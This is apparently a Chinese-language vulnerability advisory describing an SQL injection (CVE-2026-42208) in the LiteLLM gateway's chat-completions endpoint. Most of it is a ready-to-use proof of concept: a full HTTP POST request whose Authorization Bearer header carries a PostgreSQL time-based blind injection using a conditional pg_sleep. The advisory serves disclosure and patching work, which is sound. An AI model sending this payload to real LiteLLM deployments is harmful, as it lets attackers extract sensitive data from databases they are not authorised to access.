LiteLLM /v1/chat/completions SQL 注入漏洞(CVE-2026-42208)

2026-04-29 LiteLLM PoC Public

Description

LiteLLM 是一个开源的大语言模型(LLM)统一 API 网关,支持调用 100 多种 LLM 提供商(如 OpenAI、Anthropic、Claude、Hugging Face 等),提供统一的接口、负载均衡、缓存、重试、fallback 等企业级功能,广泛应用于 AI 应用开发、大模型集成、API 网关等场景。LiteLLM /v1/chat/completions 接口存在 SQL 注入漏洞,攻击者可通过构造恶意 Authorization 头部,利用 PostgreSQL 时间盲注获取数据库敏感信息。

PoC

POST /chat/completions HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 62
User-Agent: python-requests/2.33.1
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Authorization: Bearer t' OR (SELECT CASE WHEN (1=0) THEN pg_sleep(1.2) ELSE pg_sleep(0) END) IS NOT NULL--

{"model": "x", "messages": [{"role": "user", "content": "x"}]}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities